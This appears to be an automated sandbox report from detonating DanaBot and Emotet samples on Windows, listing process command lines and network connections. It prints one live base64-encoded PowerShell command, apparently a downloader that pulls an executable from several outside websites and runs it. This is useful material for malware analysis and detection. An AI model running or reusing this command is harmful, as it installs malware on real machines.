"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7316,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=7536,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5408,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=7948,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7724,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7548,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x300 0x508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7852,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=7888,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7860,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7816 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7872,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=7940,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3560,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=8452,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=9144,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7652,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8024,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=8460,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=9364,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8436,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9528,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9596 /prefetch:8

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5068 -ip 5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 456

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=9760,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7904,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9224 /prefetch:8

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:80 edge.microsoft.com tcp
GB 20.26.156.215:443 github.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
GB 20.26.156.215:443 github.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.27.92:443 copilot.microsoft.com tcp
GB 20.26.156.215:443 github.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.27.92:443 copilot.microsoft.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.154:443 github.githubassets.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.22:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
FR 2.21.35.218:443 www.bing.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
NL 108.177.119.94:443 update.googleapis.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
N/A 224.0.0.251:5353 udp
GB 20.26.156.215:443 github.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 104.123.50.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
FR 2.21.35.218:443 www.bing.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
FR 2.21.35.201:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 2.21.35.201:443 www.bing.com udp
US 8.8.8.8:53 aefd.nelreports.net udp
US 8.8.8.8:53 aefd.nelreports.net udp
FR 104.123.50.130:443 aefd.nelreports.net tcp
FR 104.123.50.130:443 aefd.nelreports.net udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.82:443 th.bing.com tcp
GB 2.18.27.82:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com udp
GB 2.18.27.76:443 th.bing.com udp
GB 2.18.27.82:443 th.bing.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 private-user-images.githubusercontent.com udp
US 8.8.8.8:53 private-user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 185.199.109.133:443 private-user-images.githubusercontent.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 140.82.113.21:443 collector.github.com tcp
FR 2.21.35.218:443 www.bing.com udp
FR 2.21.35.218:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.27.82:443 th.bing.com udp
GB 2.18.27.82:443 th.bing.com udp
GB 2.18.27.82:443 th.bing.com udp
GB 2.18.27.82:443 th.bing.com udp
US 8.8.8.8:53 xpaywalletcdn.azureedge.net udp
US 8.8.8.8:53 xpaywalletcdn.azureedge.net udp
US 13.107.246.64:443 xpaywalletcdn.azureedge.net tcp
US 8.8.8.8:53 rewards.bing.com udp
US 8.8.8.8:53 rewards.bing.com udp
US 150.171.28.10:443 rewards.bing.com tcp
US 8.8.8.8:53 crazy-cattle-3d.com udp
US 8.8.8.8:53 crazy-cattle-3d.com udp
US 172.67.212.145:443 crazy-cattle-3d.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 www.highperformanceformat.com udp
US 8.8.8.8:53 www.highperformanceformat.com udp
US 172.240.108.84:443 www.highperformanceformat.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 pl26394200.profitableratecpm.com udp
US 8.8.8.8:53 pl26394200.profitableratecpm.com udp
US 8.8.8.8:53 www.clarity.ms udp
US 8.8.8.8:53 www.clarity.ms udp
US 13.107.246.64:443 www.clarity.ms tcp
US 172.240.108.76:443 pl26394200.profitableratecpm.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 173.194.69.156:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 crazy-cattle3d.org udp
US 8.8.8.8:53 crazy-cattle3d.org udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 104.17.24.14:443 cdnjs.cloudflare.com udp
US 104.21.64.1:443 crazy-cattle3d.org udp
NL 172.217.218.136:443 www.youtube.com tcp
NL 172.217.218.136:443 www.youtube.com tcp
NL 172.217.218.136:443 www.youtube.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
NL 172.217.218.136:443 www.youtube.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.145.119:443 i.ytimg.com tcp
NL 74.125.143.102:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 j.clarity.ms udp
US 8.8.8.8:53 j.clarity.ms udp
US 52.184.215.111:443 j.clarity.ms tcp
NL 74.125.143.102:443 fundingchoicesmessages.google.com udp
US 172.67.212.145:443 crazy-cattle-3d.com udp
US 52.184.215.111:443 j.clarity.ms tcp
NL 74.125.143.102:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 173.194.69.155:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 173.194.79.95:443 jnn-pa.googleapis.com tcp
NL 173.194.79.95:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.250.153.106:443 www.google.com udp
NL 142.250.145.148:443 static.doubleclick.net tcp
NL 74.125.128.132:443 yt3.ggpht.com tcp
NL 74.125.128.132:443 yt3.ggpht.com tcp
NL 173.194.79.95:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.31.139:443 play.google.com tcp
NL 142.251.31.139:443 play.google.com tcp
NL 142.251.31.139:443 play.google.com tcp
NL 142.251.31.139:443 play.google.com tcp
NL 142.251.31.139:443 play.google.com tcp
NL 142.251.31.139:443 play.google.com tcp
US 8.8.8.8:53 c.clarity.ms udp
US 8.8.8.8:53 c.clarity.ms udp
IE 13.74.129.1:443 c.clarity.ms tcp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 150.171.28.10:443 c.bing.com tcp
NL 142.251.31.139:443 play.google.com udp
NL 173.194.69.155:443 googleads.g.doubleclick.net udp
